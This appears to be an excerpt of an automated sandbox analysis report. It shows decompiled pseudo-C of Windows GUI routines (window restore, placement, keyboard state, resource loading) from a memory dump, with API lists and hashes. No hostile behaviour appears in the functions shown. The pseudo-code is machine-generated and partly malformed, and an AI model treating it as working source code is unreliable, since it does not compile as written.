                                                                                0x0044f0a4
                                                                                0x0044f084
                                                                                0x0044ef18
                                                                                0x0044ef19
                                                                                0x0044f169
                                                                                0x0044f16c
                                                                                0x0044f16f
                                                                                0x00000000
                                                                                0x0044f175
                                                                                0x0044f175
                                                                                0x0044f178
                                                                                0x0044f17f
                                                                                0x00000000
                                                                                0x0044f185
                                                                                0x0044f198
                                                                                0x0044f19a
                                                                                0x0044f19c
                                                                                0x00000000
                                                                                0x0044f1a2
                                                                                0x0044f1a5
                                                                                0x0044f1ab
                                                                                0x0044f1b0
                                                                                0x0044f1be
                                                                                0x0044f1cd
                                                                                0x0044f1db
                                                                                0x0044f1e7
                                                                                0x0044f1f5
                                                                                0x0044f1fe
                                                                                0x0044f211
                                                                                0x0044f224
                                                                                0x0044f229
                                                                                0x0044f22c
                                                                                0x0044f22f
                                                                                0x0044f234
                                                                                0x0044f239
                                                                                0x0044f24b
                                                                                0x0044f24b
                                                                                0x0044f19c
                                                                                0x0044f17f
                                                                                0x0044ef1f
                                                                                0x0044f297
                                                                                0x0044f299
                                                                                0x0044f29f
                                                                                0x0044f2ad
                                                                                0x0044f2be
                                                                                0x0044f2cf
                                                                                0x0044f2e0
                                                                                0x0044f2f1
                                                                                0x0044f302
                                                                                0x0044f302
                                                                                0x0044f307
                                                                                0x0044f30c
                                                                                0x0044f311
                                                                                0x0044f317
                                                                                0x0044f317
                                                                                0x0044ef19
                                                                                0x0044ef12
                                                                                0x0044ef0d
                                                                                0x0044ef01

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: RestoreSave$B080Focus
                                                                                • String ID:
                                                                                • API String ID: 809140284-0
                                                                                • Opcode ID: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction ID: 1e439a01ec3daa42eb792b9dfe2fd44ac08b08da1caa0c646f1805c946d7d8a3
                                                                                • Opcode Fuzzy Hash: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction Fuzzy Hash: BDB16F34A00104EFEB11DF69C586AAEB7F5EB09304F6544BAE804D7761CB38EE45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455044, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00455044(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045403C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406CF8();
						}
					}
					_t26 =  *0x486b30; // 0x487a94
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x486b30; // 0x487a94
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0044FDF4(_t36, 0);
						E004521CC( *((intOrPtr*)(_t51 + 0x44)));
					}
					E004546B8(_t51);
					_t21 =  *0x487c00; // 0x2290f1c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043BD14(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}











                                                                                0x00455046
                                                                                0x0045504c
                                                                                0x00455053
                                                                                0x0045505d
                                                                                0x00455066
                                                                                0x004550a0
                                                                                0x004550a8
                                                                                0x00455077
                                                                                0x00455085
                                                                                0x00455087
                                                                                0x00000000
                                                                                0x00455089
                                                                                0x00455089
                                                                                0x0045508b
                                                                                0x00455090
                                                                                0x00455098
                                                                                0x00455099
                                                                                0x00455099
                                                                                0x00455087
                                                                                0x004550b5
                                                                                0x004550be
                                                                                0x004550c0
                                                                                0x004550c2
                                                                                0x004550c2
                                                                                0x004550c8
                                                                                0x004550d1
                                                                                0x004550d3
                                                                                0x004550d5
                                                                                0x004550d5
                                                                                0x004550df
                                                                                0x004550e4
                                                                                0x004550e9
                                                                                0x004550fc
                                                                                0x00455104
                                                                                0x00455104
                                                                                0x0045510b
                                                                                0x00455110
                                                                                0x00455115
                                                                                0x0045511a
                                                                                0x00455124
                                                                                0x00455124
                                                                                0x00455131
                                                                                0x00000000
                                                                                0x0045513b
                                                                                0x00455131
                                                                                0x00455143

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0045504C
                                                                                • SetActiveWindow.USER32(?,?,?,?,00454A8E,00000000,00454F30), ref: 0045505D
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00455080
                                                                                • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A8E,00000000,00454F30), ref: 00455099
                                                                                • SetWindowPos.USER32(?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 004550DF
                                                                                • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 00455124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 3996302123-0
                                                                                • Opcode ID: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction ID: 44efac11194c49bad489fcaca8109da60455352909604ac3486cada3038b8842
                                                                                • Opcode Fuzzy Hash: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction Fuzzy Hash: 01313070B006009BEB20AB69CD95B6A3798AF44709F58146AFE00DF3D7D67CEC888759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043B740, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E0043B740(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043C018(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043C018(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435040(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00434CF4(_t52);
						return E004037B0(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                                0x0043b749
                                                                                0x0043b74b
                                                                                0x0043b74d
                                                                                0x0043b752
                                                                                0x0043b76d
                                                                                0x0043b776
                                                                                0x0043b7a4
                                                                                0x0043b7a4
                                                                                0x0043b7a7
                                                                                0x0043b7ad
                                                                                0x0043b7b3
                                                                                0x0043b7b8
                                                                                0x0043b7bd
                                                                                0x0043b7bf
                                                                                0x0043b7c1
                                                                                0x0043b7d3
                                                                                0x0043b7dd
                                                                                0x0043b7e8
                                                                                0x0043b7e9
                                                                                0x0043b7ea
                                                                                0x0043b7eb
                                                                                0x0043b7f7
                                                                                0x0043b7f7
                                                                                0x0043b7fc
                                                                                0x0043b7fe
                                                                                0x00000000
                                                                                0x0043b809
                                                                                0x0043b77f
                                                                                0x0043b784
                                                                                0x0043b786
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043b79d
                                                                                0x00000000
                                                                                0x0043b761
                                                                                0x0043b761
                                                                                0x0043b767
                                                                                0x0043b814
                                                                                0x0043b814
                                                                                0x00000000
                                                                                0x0043b767

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0043B77F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B79D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 0043B7D3
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B7F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction ID: f697fd54e0fb4167afa721afb97f5442208712750027ed9413839f016224fae9
                                                                                • Opcode Fuzzy Hash: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction Fuzzy Hash: 51210375A00204ABCF54EE6DC8C1ADA77A8EF4C354F04546AFE14EF346D779E9048BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454F94, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00454F94(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E004546A8();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045403C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043BD14( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406CF8();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}






                                                                                0x00454f96
                                                                                0x00454f98
                                                                                0x00454f9c
                                                                                0x00454fa3
                                                                                0x00454fab
                                                                                0x00454fb0
                                                                                0x00454fb4
                                                                                0x00454fbd
                                                                                0x00455021
                                                                                0x00455024
                                                                                0x00454fe0
                                                                                0x00454fe4
                                                                                0x00454ff6
                                                                                0x00454ffc
                                                                                0x00455000
                                                                                0x00455005
                                                                                0x00455007
                                                                                0x0045500c
                                                                                0x00455011
                                                                                0x00455011
                                                                                0x00455014
                                                                                0x00455015
                                                                                0x00455015
                                                                                0x00455031
                                                                                0x00000000
                                                                                0x0045503b
                                                                                0x00455031
                                                                                0x00455043

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 00454F9C
                                                                                • SetActiveWindow.USER32(00000000,00000000,?,?,0045562C), ref: 00454FB4
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00454FD7
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045562C), ref: 00455000
                                                                                • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455015
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1720852555-0
                                                                                • Opcode ID: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction ID: bc32191d19c11dd8aa89d07b34db473d5acae12cf2d68384427f1f3fe8b85b2d
                                                                                • Opcode Fuzzy Hash: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction Fuzzy Hash: AC113D716006009BDB50EE69C9C6B6A37ACAF08709F08106ABE00DF2C7D67DEC848768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426384, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00426384(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x487abd != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E004262F4( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x487a98; // 0x426384
				 *0x487a98 = E00426184(1, _t19, _t21, __edi, _t23);
				return  *0x487a98(_t23, _t19);
			}










                                                                                0x0042638c
                                                                                0x0042638f
                                                                                0x00426399
                                                                                0x004263c3
                                                                                0x004263d4
                                                                                0x004263e7
                                                                                0x004263d6
                                                                                0x004263db
                                                                                0x004263db
                                                                                0x00000000
                                                                                0x004263f1
                                                                                0x00000000
                                                                                0x004263c5
                                                                                0x004263a0
                                                                                0x004263ad
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: MonitorFromWindow
                                                                                • API String ID: 190572456-2842599566
                                                                                • Opcode ID: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction ID: 567358acfe5b995f89d1c8aef49e0bb1b6a21afc04d96dbc621d34004d80f09b
                                                                                • Opcode Fuzzy Hash: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction Fuzzy Hash: 6B018F71604129AACB01EB94AC81AAF735CEB01318B95042BFC2593242DB3DDA1187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00458744, Relevance: 6.2, APIs: 4, Instructions: 163windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E00458744(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x4589a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E0045820C(_v8,  &_v528);
					if(E0040A92C(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E00458524(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E0045820C(_v8,  &_v540);
					_t75 = E004045D8(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E0045820C(_v8,  &_v544);
						_v12 = E004045D8(_v544);
					}
					E00458720(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E0045820C(_v8,  &_v532);
					if(_t135 < E004045D8(_v532)) {
						E0045820C(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0xda6855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E00458720(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x4589ab);
						return E00404344( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x46bc44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x458912);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037B0(_v8, _t177);
						SendMessageA(E0043BD14(_v8), 0x100,  *(0x46bc44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037B0(_v8, _t177);
						SendMessageA(E0043BD14(_v8), 0x101,  *(0x46bc44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x458919);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}



























                                                                                0x00458745
                                                                                0x00458747
                                                                                0x00458751
                                                                                0x00458757
                                                                                0x0045875d
                                                                                0x00458763
                                                                                0x00458769
                                                                                0x0045876f
                                                                                0x00458771
                                                                                0x00458776
                                                                                0x00458777
                                                                                0x0045877c
                                                                                0x0045877f
                                                                                0x00458785
                                                                                0x00458790
                                                                                0x004587a4
                                                                                0x004587a6
                                                                                0x004587a6
                                                                                0x004587a4
                                                                                0x004587a7
                                                                                0x004587b4
                                                                                0x00458933
                                                                                0x00458937
                                                                                0x00458939
                                                                                0x0045893b
                                                                                0x0045893b
                                                                                0x00458947
                                                                                0x00458952
                                                                                0x00458957
                                                                                0x0045895a
                                                                                0x00458965
                                                                                0x00458975
                                                                                0x00458975
                                                                                0x00458981
                                                                                0x00000000
                                                                                0x004587ba
                                                                                0x004587be
                                                                                0x004587c2
                                                                                0x004587c2
                                                                                0x004587c8
                                                                                0x004587d2
                                                                                0x004587e4
                                                                                0x004587ef
                                                                                0x00458809
                                                                                0x0045880c
                                                                                0x0045880e
                                                                                0x0045880e
                                                                                0x0045880c
                                                                                0x00458812
                                                                                0x00458812
                                                                                0x0045881b
                                                                                0x0045881d
                                                                                0x00458820
                                                                                0x00458820
                                                                                0x0045882a
                                                                                0x00458832
                                                                                0x0045892b
                                                                                0x00458986
                                                                                0x00458986
                                                                                0x00458988
                                                                                0x0045898b
                                                                                0x0045898e
                                                                                0x004589a3
                                                                                0x00458838
                                                                                0x0045883f
                                                                                0x00458844
                                                                                0x00458849
                                                                                0x0045884f
                                                                                0x0045884f
                                                                                0x00458852
                                                                                0x00458853
                                                                                0x00458853
                                                                                0x00458853
                                                                                0x00458856
                                                                                0x00458874
                                                                                0x00458883
                                                                                0x0045888b
                                                                                0x00458894
                                                                                0x00458895
                                                                                0x0045889a
                                                                                0x0045889d
                                                                                0x004588a9
                                                                                0x004588c8
                                                                                0x004588d6
                                                                                0x004588f5
                                                                                0x004588fc
                                                                                0x004588ff
                                                                                0x00458902
                                                                                0x00458907
                                                                                0x0045890a
                                                                                0x00458911
                                                                                0x00458911
                                                                                0x00458832

                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,004589A4), ref: 0045883F
                                                                                • SetKeyboardState.USER32(00000081), ref: 00458883
                                                                                • SendMessageA.USER32(00000000,00000100,00000000,00000001), ref: 004588C8
                                                                                • SendMessageA.USER32(00000000,00000101,00000000,00000001), ref: 004588F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: KeyboardMessageSendState
                                                                                • String ID:
                                                                                • API String ID: 1999190242-0
                                                                                • Opcode ID: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction ID: 23862da68592c1e24948ec3166a75afe102c93af0ee48796f61bef12c2e153a4
                                                                                • Opcode Fuzzy Hash: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction Fuzzy Hash: 87615DB49006089FCB10EBA9C885ADDB7F4EB58304F6041EAE844B7392DF385F84DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004168F4, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E004168F4(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00416884(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416694
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00416884(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416694
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x4161c0
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416654(_t23, _t25, _t18);
			}

















                                                                                0x004168fb
                                                                                0x004168fe
                                                                                0x00416900
                                                                                0x00416910
                                                                                0x00416912
                                                                                0x00416915
                                                                                0x00416917
                                                                                0x0041691a
                                                                                0x0041691f
                                                                                0x0041691f
                                                                                0x00416920
                                                                                0x0041692a
                                                                                0x0041692c
                                                                                0x0041692f
                                                                                0x00416931
                                                                                0x00416934
                                                                                0x00416939
                                                                                0x0041693a
                                                                                0x00416944
                                                                                0x00416945
                                                                                0x00416949
                                                                                0x00416952
                                                                                0x0041695d

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0041690B
                                                                                • LoadResource.KERNEL32(?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416925
                                                                                • SizeofResource.KERNEL32(?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 0041693F
                                                                                • LockResource.KERNEL32(004161C0,00000000,?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
